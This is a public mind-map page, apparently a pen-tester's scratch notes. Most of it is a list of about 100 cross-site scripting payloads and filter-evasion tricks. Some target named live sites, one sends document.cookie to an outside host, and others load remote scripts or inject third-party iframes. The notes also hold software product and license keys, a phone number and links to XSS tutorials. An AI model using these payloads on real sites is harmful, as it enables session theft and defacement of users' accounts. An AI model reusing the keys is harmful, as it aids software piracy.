Iniziamo. È gratuito!
o registrati con il tuo indirizzo email
[email protected] da Mind Map: rt.1011@outlook.com

1. 32

2. 1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

3. <img src="/" =_=" title="onerror='prompt(1)'">

4. Build > Activities me Task field done

5. %253cscript%253ealert(/xss-by-shawar/)%253c/script%253e

6. Product Key: D275-7NPG-2YPB-PFBR

7. imp :

8. <marquee onstart='javascript:alert&#x28;"note"&#x29;'>^__^

9. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

10. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

11. DOM : --><iframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html><%2Fiframe>

12. http://shawarkhan.byethost7.com/?input=--%3E%3Ciframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html%3E%3C%2Fiframe%3E

13. http://shawarkhan.byethost7.com/?input=--%3E%3Ciframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html%3E%3C%2Fiframe%3E

14. <base href="javascript:\">

15. <a href="//%0aalert(/@irsdl/);//">Possible XSS - works in Chrome</a>

16. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">s

17. <!--<img src="--><img src=x onerror=alert(123)//">

18. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���

19. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���

20. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���

21. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���

22. '"--></style></script><script>alert("XSSed by Cyb3R_Shubh4M")

23. callback=<if

24. rame src='http://xssed.com'

25. -%22%3E%3Cscript%3Ealert%28document.cookie%29%3C

26. /script%3E-

27. '"--><script>alert(/Xss2ro07 aKa Side3ffects)</script>

28. http://go.mcafee.com/activation.cfm?firewall_id=%22%20style=%22background-image:url%28%27http://i.imgur.com/oHp8A.gif%27%29%22%20onfocus=%22document.write%28String.fromCharCode%2860%29%2B%27iframe%20src=http://xssed.com%20height=100%25%20width=100%25%3E%27%2BString.fromCharCode%2860%29%2B%27/iframe%3E%27%2BString.fromCharCode%2860%29%2B%27script%3Ealert%28/XSS%20/%29%27%2BString.fromCharCode%2860%29%2B%27/script%3E%27%29%22%20foo=%22bar

29. <script>location.href="https://testingxssrj.000webhostapp.com/cookiefile.php?cookie=document.cookie<script>"

29.1. '<svg onload="alert('xx')">'

30. '<img src="c" onload="alert(1)">'

31. <script language="JaVaScript">

32. fixEscape

33. for dom : javascript:alert%281%29

33.1. javascript:prompt(document.domain);

34. https://www.collective2.com/cgi-perl/verify.mpl?pid=102085904&k=30124476804813

35. <body onload=alert("XSS")>

36. %27|alert%28%27XSS%27%29|%27

37. ');alert('XSS

38. all vulnerabilities videos : https://www.youtube.com/watch?v=d1D7twRO5Ys

39. ssltest

40. http://ssl-checker.online-domain-tools.com/

41. A3-K7QCDX-F544N9-QYLM3-S4CBC-4DSZP-YH63X

42. javascript:alert(document.domain)

42.1. "><script>alert(1);</script>#"><img src=x onerror=prompt(1);>

43. http://www.<script>alert(1)</script .com

44. <var onmouseover="prompt(1)">On Mouse Over</var>

45. 2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

46. 3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

47. Account Lockout Hackerone

48. 4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}

49. 5) <img/src=`%00` onerror=this.onerror=confirm(1)

50. 6) <form><isindex formaction="javascript&colon;confirm(1)"

51. 7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;

52. 8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

53. 9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

54. 10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

55. 11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

56. 12) &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00

57. 13) <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

58. 14) <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

59. 15) <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

60. 16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

61. 17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

62. 18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

63. 19) <form><a href="javascript:\u0061lert&#x28;1&#x29;">X sssssssssssssssss

64. 20) </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>

65. 21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

66. 22) <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

67. 23) <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

68. 24) http://www.google<script .com>alert(document.location)</script

69. 25) <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

70. 26) <img/[email protected]&#32;&#13; onerror = prompt('&#49;') sss

71. 27) <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

72. 28) <script ^__^>alert(String.fromCharCode(49))</script ^__^

73. 29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(

74. 30) &#00;</form><input type&#61;"date" onfocus="alert(1)"> sssssssssssss

75. 31) <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> ss

76. 32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

77. 33) <iframe srcdoc='<body onload=prompt&lpar;1&rpar;>'>

78. 34) <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

79. 35) <script ~~~>alert(0%0)</script ~~~> abh

80. 36) <style/onload=<!--&#09;>&#10;alert&#10;&lpar;1&rpar;>

81. 37) <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

82. 38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

83. 39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

84. 40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

85. 41) <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

86. 42) <div/style="width:expression(confirm(1))">X</div> {IE7}

87. 43) <iframe/%00/ src=javaSCRIPT&colon;alert(1)

88. 44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

89. 45) /*iframe/src*/<iframe/src="<iframe/[email protected]"/onload=prompt(1) /*iframe/src*/>

90. 46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

91. 47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

92. 48) <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

93. 49) </plaintext\></|\><plaintext/onmouseover=prompt(1)

94. 50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}

95. 51) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> ss

96. 52) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>

97. 53) <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

98. 54) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> ssss

99. 55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

100. 56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

101. 57) <var onmouseover="prompt(1)">On Mouse Over</var>

102. 58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> sss

103. 59) <img src="/" =_=" title="onerror='prompt(1)'">

104. 60) <%<!--'%><script>alert(1);</script -->

105. 61) <script src="data:text/javascript,alert(1)"></script>

106. 62) <iframe/src \/\/onload = prompt(1)

107. 63) <iframe/onreadystatechange=alert(1)

108. 64) <svg/onload=alert(1)

109. 65) <input value=<><iframe/src=javascript:confirm(1)

110. 66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

111. 67) http://www.<script>alert(1)</script .com

112. 68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

113. 69) <svg><script ?>alert(1)

114. 70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

115. 71) <img src=`xx:xx`onerror=alert(1)>

116. 72)

117. 73) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>

118. 74) ss <math><a xlink:href="//jsfiddle.net/t846h/">click

119. 75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

120. 76) <svg contentScriptType=text/vbs><script>MsgBox+1

121. 77) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

122. 78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

123. 79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

124. 80) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F

125. 81) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

126. 82) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

127. 83) <script>+-+-1-+-+alert(1)</script>

128. 84) <body/onload=<!-->&#10alert(1)>

129. 85) <script itworksinallbrowsers>/*<script* */alert(1)</script

130. 86) <img src ?itworksonchrome?\/onerror = alert(1)

131. 87) <svg><script>//&NewLine;confirm(1);</script </svg>

132. 88) <svg><script onlypossibleinopera:-)> alert(1)

133. 89) ss<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

134. 90) <script x> alert(1) </script 1=2

135. 91) <div/onmouseover='alert(1)'> style="x:">

136. 92) <--`<img/src=` onerror=alert(1)> --!>

137. https://www.google.com.pk/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=metasploit+tp+link

138. Your License Key: 7SCQ-P3LE-F6RE-DYYC

139. 93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

140. 94) <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>ss

141. 95) "><img src=x onerror=window.open('https://www.google.com/');>

142. 96) ss<form><button formaction=javascript&colon;alert(1)>CLICKME

143. 97) ss<math><a xlink:href="//jsfiddle.net/t846h/">click

144. 98) ss<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

145. 99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>ss

146. ss

147. 100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

148. https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester

149. 0300 7014685

150. New

151. %3E%3Cimg+src%3Dx+onerror%3Dprompt(1)%3B%3E

152. http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html

153. HTTP Cashe Poisoning issue

154. Email Change Request Dosent Expir After Password Change

155. Detecting Xss with advance fuzzer

156. www.youtube.com/watch?v=R8AgEWPFJ1g

157. ]Detecting and Exploiting XSS with Xenotix XSS Exploit

158. https://www.exploit-db.com/docs/21223.pd

159. Discovering XSS Vulnerabilities with Burp Intruder

160. http://bughunting.guide/discovering-xss-vulnerabilities-with-burp-intruder/

161. check it soon

162. https://fdhdhdfhdh-dev-ed.my.salesforce.com/ui/support/servicedesk/ServiceDeskHotkeyEditor/e?retURL=%2Fui%2Fsupport%2Fservicedesk%2FServiceDeskHotkeyEditor%2Fd%3Ftsid%3D02u28000000LOiq&tsid=02u28000000LOiq#

163. https://<your_instance>.my.salesforce.com/setup/ui/replacePickList.jsp?msg=This%20is%20dom%20based%20XSS+%3Cimg%20src=M%20onerror=prompt%281%29;%3E&retURL=%2Fsetup%2Fui%2Fpicklist_masterdetail.jsp%3Ftid%3D03j%26pt%3D45%26retURL%3D%252Fui%252Fsetup%252FSetup%253Fsetupid%253DCase%26setupid%3DCaseContactRoles&tableName=CaseContactRole&id=45&setupid=CaseContactRoles